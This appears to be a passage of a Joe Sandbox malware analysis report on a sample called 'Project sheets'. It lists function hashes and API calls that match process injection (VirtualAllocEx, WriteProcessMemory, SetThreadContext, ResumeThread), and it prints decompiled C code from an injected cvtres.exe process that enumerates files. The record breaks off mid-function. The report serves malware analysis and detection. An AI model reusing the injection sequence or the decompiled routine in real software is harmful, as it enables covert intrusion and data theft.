Opcode ID: a136610eaf8bb5e0d243952b856c6ea2991373e0e54258f7f8c19c4da6760332
Instruction ID: 471fbfc1bdaa57050e1708130e77ef77da543e25e87fffdfba64f66fab713f64
Opcode Fuzzy Hash: a136610eaf8bb5e0d243952b856c6ea2991373e0e54258f7f8c19c4da6760332
Instruction Fuzzy Hash: C621E8B1E046188BEB28CFAAD8443DEFBF2BFC8310F14C16AD509A6254DB750A46CF50

Uniqueness

Uniqueness Score: -1.00%

Function 017F0448 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.245849458.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17f0000_Project sheets.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a7766e07ee348055d03fc6b37533eb09c181a7abfab7fd1f389406ad456f758
Instruction ID: 90a97b201a0303984bbf3a748ebd96848e816f3ba5649bb30fe2624413ede17a
Opcode Fuzzy Hash: 3a7766e07ee348055d03fc6b37533eb09c181a7abfab7fd1f389406ad456f758
Instruction Fuzzy Hash: A8110D71E016199BEB28CFABDC4469EFBF3BFC8300F04C07AD908A6218EB3005428E10

Uniqueness

Uniqueness Score: -1.00%

Function 017FC1B4 Relevance: 1.7, APIs: 1, Instructions: 237
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 017FC39F

Memory Dump Source

Source File: 00000000.00000002.245849458.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17f0000_Project sheets.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 79dfd48693eed8ab741408c3f775a4510cee93279cb2a7ec3c7b198d263a91d3
Instruction ID: 627fbd4ffccb235684019ea614f6ead45454ab50fdc3d19f5894f0843cfb1ebb
Opcode Fuzzy Hash: 79dfd48693eed8ab741408c3f775a4510cee93279cb2a7ec3c7b198d263a91d3
Instruction Fuzzy Hash: 8A81D275D0026D9FCB25CFA9C980BDEBBF1AF19304F0090AAE548B7260D7749A89CF54

Uniqueness

Uniqueness Score: -1.00%

Function 017FC1C0 Relevance: 1.7, APIs: 1, Instructions: 236
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 017FC39F

Memory Dump Source

Source File: 00000000.00000002.245849458.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17f0000_Project sheets.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 8ca844da5999bdc592a753d3fcd33c66372bff90abd300a270587c4cfcab27ac
Instruction ID: dadafbf9829cd8d911045f4aac6bca791b75552775cce6d72fb684cd26b0be53
Opcode Fuzzy Hash: 8ca844da5999bdc592a753d3fcd33c66372bff90abd300a270587c4cfcab27ac
Instruction Fuzzy Hash: 7681E375D0026D9FCB25CFA9C980BDEFBF1AB09304F0090AAE548B7260D7749A89CF54

Uniqueness

Uniqueness Score: -1.00%

Function 017FC8F8 Relevance: 1.6, APIs: 1, Instructions: 110
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 017FC9C6

Memory Dump Source

Source File: 00000000.00000002.245849458.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17f0000_Project sheets.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 81ab93e4428dac2688188579e02141176e1c09b2cf21f90519c69a815959196e
Instruction ID: 72a0a6d993ecef7180e7dfb25b5f861b5744bae30bc5e697ebd1b69ae51c6267
Opcode Fuzzy Hash: 81ab93e4428dac2688188579e02141176e1c09b2cf21f90519c69a815959196e
Instruction Fuzzy Hash: CF4165B5D012589FCB10CFA9D984ADEFBF1BB49314F24902AE918B7310D375AA45CB64

Uniqueness

Uniqueness Score: -1.00%

Function 017FC8F4 Relevance: 1.6, APIs: 1, Instructions: 110
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 017FC9C6

Memory Dump Source

Source File: 00000000.00000002.245849458.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17f0000_Project sheets.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 8e21b8f8e89bdb61dc5a0a763f3d4496bd5dcdd27c79aba08320a676d69831fa
Instruction ID: d8f4e7b742946656bfe30e9bb3546f1ce72f4e774089e00a88f738d9cf6ac4a8
Opcode Fuzzy Hash: 8e21b8f8e89bdb61dc5a0a763f3d4496bd5dcdd27c79aba08320a676d69831fa
Instruction Fuzzy Hash: 534175B5D012589FCB10CFA9D984AEEFBF1BB49314F24902AE918B7310D335AA45CB64

Uniqueness

Uniqueness Score: -1.00%

Function 017FC70F Relevance: 1.6, APIs: 1, Instructions: 107
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 017FC80D

Memory Dump Source

Source File: 00000000.00000002.245849458.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17f0000_Project sheets.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 8ce6f8d7400040b05a6831d20f39b23062a6d00ddf07df2c1ca260e7ed7a0a12
Instruction ID: caf2eadfba8fd9a6d42f3c8b5ae2eab9d228ed09221b33f5743e1a584aab0a57
Opcode Fuzzy Hash: 8ce6f8d7400040b05a6831d20f39b23062a6d00ddf07df2c1ca260e7ed7a0a12
Instruction Fuzzy Hash: 3E31CE75D052489FCF11CFA8E480ADEFBB0BB5A314F10A06AE914B7310D3359945DF55

Uniqueness

Uniqueness Score: -1.00%

Function 017FC600 Relevance: 1.6, APIs: 1, Instructions: 102
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 017FC6B5

Memory Dump Source

Source File: 00000000.00000002.245849458.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17f0000_Project sheets.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: f7a57c1fb40c7c8987b4699580720a56cb0417a8538feff4ec0757bc17331fd4
Instruction ID: 84b5781a81cae16befc921d5ba4a9c810783d3ec1ff5bdb253ca647da9bb2740
Opcode Fuzzy Hash: f7a57c1fb40c7c8987b4699580720a56cb0417a8538feff4ec0757bc17331fd4
Instruction Fuzzy Hash: BB4177B9D042589FCF10CFA9D984ADEFBB1BB19314F10A06AE824B7310D335A946DF64

Uniqueness

Uniqueness Score: -1.00%

Function 017FC608 Relevance: 1.6, APIs: 1, Instructions: 100
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 017FC6B5

Memory Dump Source

Source File: 00000000.00000002.245849458.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17f0000_Project sheets.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 99e5fa9a37a8de1b4e1e7ca13ce8b338e355306a7082f0f171bbf9a1e0a7015f
Instruction ID: 3b8b90d92083bea5115dbef8a4b7e01fdacf62c3f2b7ba3a8e88c96457f0c8d1
Opcode Fuzzy Hash: 99e5fa9a37a8de1b4e1e7ca13ce8b338e355306a7082f0f171bbf9a1e0a7015f
Instruction Fuzzy Hash: 583187B9D042589FCF10CFAAD984ADEFBB5BB19310F10A02AE924B7310D335A945CF64

Uniqueness

Uniqueness Score: -1.00%

Function 017FC761 Relevance: 1.6, APIs: 1, Instructions: 96
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 017FC80D

Memory Dump Source

Source File: 00000000.00000002.245849458.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17f0000_Project sheets.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: d59e4a2f974f6b8ecaf371394d37faa12cf2a9f03843c151a08d4b0620c74eae
Instruction ID: 596ebe575b9a8676ed1c6fbf5ac08dec8efbf134bddaf312381b604b3449bfee
Opcode Fuzzy Hash: d59e4a2f974f6b8ecaf371394d37faa12cf2a9f03843c151a08d4b0620c74eae
Instruction Fuzzy Hash: 9F3167B9D042589FCF10CFA9D984ADEFBB5BB59310F10902AE814B7310D335A946CF64

Uniqueness

Uniqueness Score: -1.00%

Function 017FC768 Relevance: 1.6, APIs: 1, Instructions: 95
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 017FC80D

Memory Dump Source

Source File: 00000000.00000002.245849458.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17f0000_Project sheets.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 2d9c806efc002b95fe817203e37ff864d8f876f5d741b316780556756bfbeb68
Instruction ID: db1c4b7f27498c1faf04356fb377086fb01337cf867eb19c2c0c5677857e79bb
Opcode Fuzzy Hash: 2d9c806efc002b95fe817203e37ff864d8f876f5d741b316780556756bfbeb68
Instruction Fuzzy Hash: 073155B9D042589FCF10CFA9D984ADEFBB5BB19320F10A02AE914B7310D335A945CF65

Uniqueness

Uniqueness Score: -1.00%

Function 017FC4F1 Relevance: 1.6, APIs: 1, Instructions: 89threadinjectionCOMMON

Download Yara Rule

APIs

SetThreadContext.KERNELBASE(?,?), ref: 017FC5A2

Memory Dump Source

Source File: 00000000.00000002.245849458.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17f0000_Project sheets.jbxd

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: 83db02b45e313563d6535a362bcd07e3e16b18f3a5da808a10d0de0338788cf3
Instruction ID: e6a81b003e13404df06de91e20c506cdbc5bb4dba01171311a6237aefc83fa64
Opcode Fuzzy Hash: 83db02b45e313563d6535a362bcd07e3e16b18f3a5da808a10d0de0338788cf3
Instruction Fuzzy Hash: C031A8B5D012589FCB10CFA9D984AEEFBF1BB49314F24806AE414B7310C379AA45CF64

Uniqueness

Uniqueness Score: -1.00%

Function 017FC4F8 Relevance: 1.6, APIs: 1, Instructions: 88threadinjectionCOMMON

Download Yara Rule

APIs

SetThreadContext.KERNELBASE(?,?), ref: 017FC5A2

Memory Dump Source

Source File: 00000000.00000002.245849458.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17f0000_Project sheets.jbxd

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: 7781a164da932cdefa2af367d476eeac8f4c5bdae23203c5ad54e96ca4855e16
Instruction ID: 4af8681b58cf1ffaea8008e95fa59038e017b52f30ad0a7c118f92997c67a36e
Opcode Fuzzy Hash: 7781a164da932cdefa2af367d476eeac8f4c5bdae23203c5ad54e96ca4855e16
Instruction Fuzzy Hash: 813198B5D012589FCB10CFAAD984ADEFBF1BB49314F24902AE518B7310D378AA45CF64

Uniqueness

Uniqueness Score: -1.00%

Function 017FCA38 Relevance: 1.6, APIs: 1, Instructions: 66threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 017FCAAE

Memory Dump Source

Source File: 00000000.00000002.245849458.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17f0000_Project sheets.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 433982921522beabb68b573e052130e4f68ad3e9a1d3a9b9489be362c0100498
Instruction ID: e40c0cc83c9e9bfaa6094986d4298480c3b52f998963a699daee45def9f4ed49
Opcode Fuzzy Hash: 433982921522beabb68b573e052130e4f68ad3e9a1d3a9b9489be362c0100498
Instruction Fuzzy Hash: 502197B9D002189FCB10CFA9D584ADEFBF4BB49324F24906AE919B7310D335A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 017FCA34 Relevance: 1.6, APIs: 1, Instructions: 66threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 017FCAAE

Memory Dump Source

Source File: 00000000.00000002.245849458.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17f0000_Project sheets.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: d7b3d90b8da2a3fffa3469c39eaf990579b7344c40ab733a70568bc005ed28f3
Instruction ID: 44077f8d43d0e773206d8c986187cf2c3f0c4fc19f49c8f928cceceaf87e91f5
Opcode Fuzzy Hash: d7b3d90b8da2a3fffa3469c39eaf990579b7344c40ab733a70568bc005ed28f3
Instruction Fuzzy Hash: 2121B7B9D002189FCB10CFA9D484ADEFBF4BB09324F24902AE918B7310D335A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 017F4FA8 Relevance: 2.7, Strings: 2, Instructions: 174COMMON

Download Yara Rule

Strings

YAy, xrefs: 017F510B
k%#, xrefs: 017F5006

Memory Dump Source

Source File: 00000000.00000002.245849458.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17f0000_Project sheets.jbxd

Similarity

API ID:
String ID: YAy$k%#
API String ID: 0-3673131554
Opcode ID: 8821a7aafd4747d8d109ee715ca5cf96f66409344efb4a8d20c720c010abd66a
Instruction ID: c8d11047fd17ae37e5d6904f1d475d001e13f65b4fe196ae37e383800a4f0990
Opcode Fuzzy Hash: 8821a7aafd4747d8d109ee715ca5cf96f66409344efb4a8d20c720c010abd66a
Instruction Fuzzy Hash: 7071F374E052099FCB08CFA9D58499EFBF2FF88310F14855AE519AB324D734AA41CF91

Uniqueness

Uniqueness Score: -1.00%

Function 017F4F98 Relevance: 2.7, Strings: 2, Instructions: 172COMMON

Download Yara Rule

Strings

YAy, xrefs: 017F510B
k%#, xrefs: 017F5006

Memory Dump Source

Source File: 00000000.00000002.245849458.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17f0000_Project sheets.jbxd

Similarity

API ID:
String ID: YAy$k%#
API String ID: 0-3673131554
Opcode ID: 80f889adef5c423a20b7786b9f806c4404439ca149dcc4b88769222825756d42
Instruction ID: e72bac63480dc7b111ed8389ed897b04cc60e1900cc9130e05ecf0a0c5ee1de9
Opcode Fuzzy Hash: 80f889adef5c423a20b7786b9f806c4404439ca149dcc4b88769222825756d42
Instruction Fuzzy Hash: E971E134E152099FCB48CFA9D58499EFBF2FF88310F14856AE519AB325D734AA41CF90

Uniqueness

Uniqueness Score: -1.00%

Function 017F5E53 Relevance: 2.7, Strings: 2, Instructions: 156COMMON

Download Yara Rule

Strings

G0, xrefs: 017F5F7B
G0, xrefs: 017F5F74

Memory Dump Source

Source File: 00000000.00000002.245849458.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17f0000_Project sheets.jbxd

Similarity

API ID:
String ID: G0$G0
API String ID: 0-2055179447
Opcode ID: 13a2c242891d8885b26b51796b44f3b299a0964935d24f8fcde798c9a0098fe7
Instruction ID: c9522a6ecdae8c83f9f90d0cb5d7b1ed22d6e576da714dc12334f9707acb8709
Opcode Fuzzy Hash: 13a2c242891d8885b26b51796b44f3b299a0964935d24f8fcde798c9a0098fe7
Instruction Fuzzy Hash: E161F5B1E0420ADBCB04CFA9D5819AEFBB1FB89300F14946AD615AB344D7349A418F95

Uniqueness

Uniqueness Score: -1.00%

Function 017F61C8 Relevance: 1.4, Strings: 1, Instructions: 107COMMON

Download Yara Rule

Strings

ft%, xrefs: 017F627E

Memory Dump Source

Source File: 00000000.00000002.245849458.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17f0000_Project sheets.jbxd

Similarity

API ID:
String ID: ft%
API String ID: 0-1733484113
Opcode ID: 9aba99d9d46027b292bcf7f7b5239086ecd7a14bcca0fbc1262b3c94508b51f2
Instruction ID: cd8701d68639f42a153ed2c9fac71e436b620dade7f735161d9e8dc3f5979cfe
Opcode Fuzzy Hash: 9aba99d9d46027b292bcf7f7b5239086ecd7a14bcca0fbc1262b3c94508b51f2
Instruction Fuzzy Hash: 8241D6B4E0820A9FCB04CFAAC9815AEFBF2EF88310F24D169D615A7254D73596418F94

Uniqueness

Uniqueness Score: -1.00%

Function 017F61B9 Relevance: 1.4, Strings: 1, Instructions: 106COMMON

Download Yara Rule

Strings

ft%, xrefs: 017F627E

Memory Dump Source

Source File: 00000000.00000002.245849458.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17f0000_Project sheets.jbxd

Similarity

API ID:
String ID: ft%
API String ID: 0-1733484113
Opcode ID: e49775ccd028e16349191e1281fd33581ee4e0c0afb781e901fd40eddc7afe24
Instruction ID: 54c52f4d5c3636f3fa0e5a54041b8bfa535dcb928d21d614ef1ed15248ffc203
Opcode Fuzzy Hash: e49775ccd028e16349191e1281fd33581ee4e0c0afb781e901fd40eddc7afe24
Instruction Fuzzy Hash: A441F4B4E1820A9FCB08CFAAC8805AEFBF2FF88310F24C56AD615A7254D73596418F54

Uniqueness

Uniqueness Score: -1.00%

Function 017F63E8 Relevance: .2, Instructions: 179COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.245849458.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17f0000_Project sheets.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb40d04a3b7abc64eba7269005aee192bb666ef5af38aff0b8093317ca48a42d
Instruction ID: 647b3683075d6242568fbc895514aa929b55fbe55d1051a62fecea47a9fae7a4
Opcode Fuzzy Hash: fb40d04a3b7abc64eba7269005aee192bb666ef5af38aff0b8093317ca48a42d
Instruction Fuzzy Hash: 1271E574E192099FCB04CFA9C6819EEFBF2FB89310F24946AE505B7314D3359A418B65

Uniqueness

Uniqueness Score: -1.00%

Function 017F63D9 Relevance: .2, Instructions: 178COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.245849458.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17f0000_Project sheets.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb7fbd0a79b1e69425c85ac707b33291c4368f99fa280413aed9280bdadb211d
Instruction ID: e02b3e5f6dfd2c39d2d40b9050460eea4d291bdc5e9330d0c218703ae85dbcb2
Opcode Fuzzy Hash: bb7fbd0a79b1e69425c85ac707b33291c4368f99fa280413aed9280bdadb211d
Instruction Fuzzy Hash: E971E574E192099FCB08CFA9C6815EEFBF2FF89310F24946AE505B7314D3359A418B65

Uniqueness

Uniqueness Score: -1.00%

Function 017FA5D0 Relevance: .2, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.245849458.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17f0000_Project sheets.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d3a0b947a8fd7ca0c980594c01960022e98c080c475ef2221c781dc8e5631ba
Instruction ID: cd9ca9e3198cc85a88c61ba71a8fbc21ea0dca4dcb31925556f6d6ebe231d382
Opcode Fuzzy Hash: 0d3a0b947a8fd7ca0c980594c01960022e98c080c475ef2221c781dc8e5631ba
Instruction Fuzzy Hash: 9F6138B4D05209CBDF14CFA9E9815EEFBB2FB85310F24942AD609B7354D7349A41CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 017FA5C0 Relevance: .2, Instructions: 169COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.245849458.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17f0000_Project sheets.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 435b710da53408e1a68602f080c308d1de6b0e7b6b1719fb7309db0c21c645a1
Instruction ID: 79b726c6945709d04187f5001bbd5c039050accf543ee8f35be10f0456edcaa9
Opcode Fuzzy Hash: 435b710da53408e1a68602f080c308d1de6b0e7b6b1719fb7309db0c21c645a1
Instruction Fuzzy Hash: 436149B5E0520ACBDF14CFA9E9415AFFBB2FF84310F24942AD609A7350D7349A41CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 017F5B58 Relevance: .2, Instructions: 162COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.245849458.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17f0000_Project sheets.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1cb4443f70b01059851e4dd498c6f356914d1a716207269915ba345273be7a2b
Instruction ID: 48902be5c4f71ca32372ccfc3b4e08ce5a48047fe33f991a5d178da0371a6350
Opcode Fuzzy Hash: 1cb4443f70b01059851e4dd498c6f356914d1a716207269915ba345273be7a2b
Instruction Fuzzy Hash: 807102B4E0520ACFCB14CF99D5809AEFBB2FF88310F14855ADA05AB314D334A982CF94

Uniqueness

Uniqueness Score: -1.00%

Function 017F5B50 Relevance: .2, Instructions: 154COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.245849458.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17f0000_Project sheets.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c4dac2c68d81b50861e6fa3b5aef0855ef49fd4a9051e34678444db219a8be2a
Instruction ID: cdfebbcdf72b833bdac6a0695a53ecd0343dc3561356610b810e76b698a40bbb
Opcode Fuzzy Hash: c4dac2c68d81b50861e6fa3b5aef0855ef49fd4a9051e34678444db219a8be2a
Instruction Fuzzy Hash: DE61F474E0520ACFCB14CFA9C5809AEFBB2FF89310F14856ADA15A7715D334A982CF94

Uniqueness

Uniqueness Score: -1.00%

Function 017F6689 Relevance: .1, Instructions: 123COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.245849458.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17f0000_Project sheets.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a88113b2ecfada85ca8f9ef46f5f29fd57da42331e7f238db855d66bc8a02b8
Instruction ID: f8ae262ee176101318bdde3d33bfa66937b42cabacc17d20f9b7a4e911664df4
Opcode Fuzzy Hash: 5a88113b2ecfada85ca8f9ef46f5f29fd57da42331e7f238db855d66bc8a02b8
Instruction Fuzzy Hash: 5C5115B4E0520A9BCB44CFAAC5815AFFBF2EF88310F24D56AD505B7314E3319A41CB99

Uniqueness

Uniqueness Score: -1.00%

Function 017F6698 Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.245849458.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17f0000_Project sheets.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0c1c02e872724f3eb71e5b78b80de498d57f8305bb587d553374432659ec465
Instruction ID: 3b4186a35450fcf846f60eb675f71d46041a5840742fc13d619e9f5223b11f66
Opcode Fuzzy Hash: b0c1c02e872724f3eb71e5b78b80de498d57f8305bb587d553374432659ec465
Instruction Fuzzy Hash: E35103B4E0520A8BDB44CFAAC5815AFFBF2BF88310F24D46AD505B7318D3359A41CB99

Uniqueness

Uniqueness Score: -1.00%

Function 017F7BC8 Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.245849458.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17f0000_Project sheets.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d662d8116aaaac1d6956abcdc4891726ca699af7001e35c163e5b5664571e0e2
Instruction ID: 689cfea0e8811d29cfd6d57bcb5e29f0501f2b45a802078172e264df110092a8
Opcode Fuzzy Hash: d662d8116aaaac1d6956abcdc4891726ca699af7001e35c163e5b5664571e0e2
Instruction Fuzzy Hash: E3319CB1E056589BDB58CF6BDD402CAF6F7AFC9310F14C1BA950CA6264EB3109428E40

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: cvtres.exePID: 3896, Parent PID: 5648COMMON

Execution Graph

Execution Coverage:	31.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	4.5%
Total number of Nodes:	1842
Total number of Limit Nodes:	92

Executed Functions

Function 00403D74 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 200
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 85%

			E00403D74(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				struct _WIN32_FIND_DATAW _v596;
				void* __ebx;
				WCHAR* _t32;
				void* _t35;
				int _t43;
				void* _t52;
				int _t56;
				intOrPtr _t60;
				void* _t66;
				void* _t73;
				void* _t74;
				WCHAR* _t98;
				void* _t99;
				void* _t100;
				void* _t101;
				WCHAR* _t102;
				void* _t103;
				void* _t104;

				L004067C4(0xa); // executed
				_t72 = 0;
				_t100 = 0x2e;
				_t106 = _a16;
				if(_a16 == 0) {
					L15:
					_push(_a8);
					_t32 = E00405B6F(0, L"%s\\%s", _a4); // executed
					_t98 = _t32;
					_t104 = _t103 + 0xc;
					if(_t98 == 0) {
						L30:
						__eflags = 0;
						return 0;
					}
					E004031E5(_t72, _t72, 0xd4f4acea, _t72, _t72);
					_t35 = FindFirstFileW(_t98,  &_v596); // executed
					_t73 = _t35;
					if(_t73 == 0xffffffff) {
						L29:
						E00402BAB(_t98);
						goto L30;
					}
					L17:
					while(1) {
						if(E00405D24( &(_v596.cFileName)) >= 3 || _v596.cFileName != _t100) {
							if(_v596.dwFileAttributes != 0x10) {
								L21:
								_push( &(_v596.cFileName));
								_t101 = E00405B6F(_t124, L"%s\\%s", _a4);
								_t104 = _t104 + 0xc;
								if(_t101 == 0) {
									goto L24;
								}
								if(_a12 == 0) {
									E00402BAB(_t98);
									E00403BEF(_t73);
									return _t101;
								}
								_a12(_t101);
								E00402BAB(_t101);
								goto L24;
							}
							_t124 = _a20;
							if(_a20 == 0) {
								goto L24;
							}
							goto L21;
						} else {
							L24:
							E004031E5(_t73, 0, 0xce4477cc, 0, 0);
							_t43 = FindNextFileW(_t73,  &_v596); // executed
							if(_t43 == 0) {
								E00403BEF(_t73); // executed
								goto L29;
							}
							_t100 = 0x2e;
							continue;
						}
					}
				}
				_t102 = E00405B6F(_t106, L"%s\\*", _a4);
				if(_t102 == 0) {
					L14:
					_t100 = 0x2e;
					goto L15;
				}
				E004031E5(0, 0, 0xd4f4acea, 0, 0);
				_t52 = FindFirstFileW(_t102,  &_v596); // executed
				_t74 = _t52;
				if(_t74 == 0xffffffff) {
					L13:
					E00402BAB(_t102);
					_t72 = 0;
					goto L14;
				} else {
					goto L3;
				}
				do {
					L3:
					if((_v596.dwFileAttributes & 0x00000010) == 0) {
						goto L11;
					}
					if(_a24 == 0) {
						L7:
						if(E00405D24( &(_v596.cFileName)) >= 3) {
							L9:
							_push( &(_v596.cFileName));
							_t60 = E00405B6F(_t114, L"%s\\%s", _a4);
							_t103 = _t103 + 0xc;
							_a16 = _t60;
							_t115 = _t60;
							if(_t60 == 0) {
								goto L11;
							}
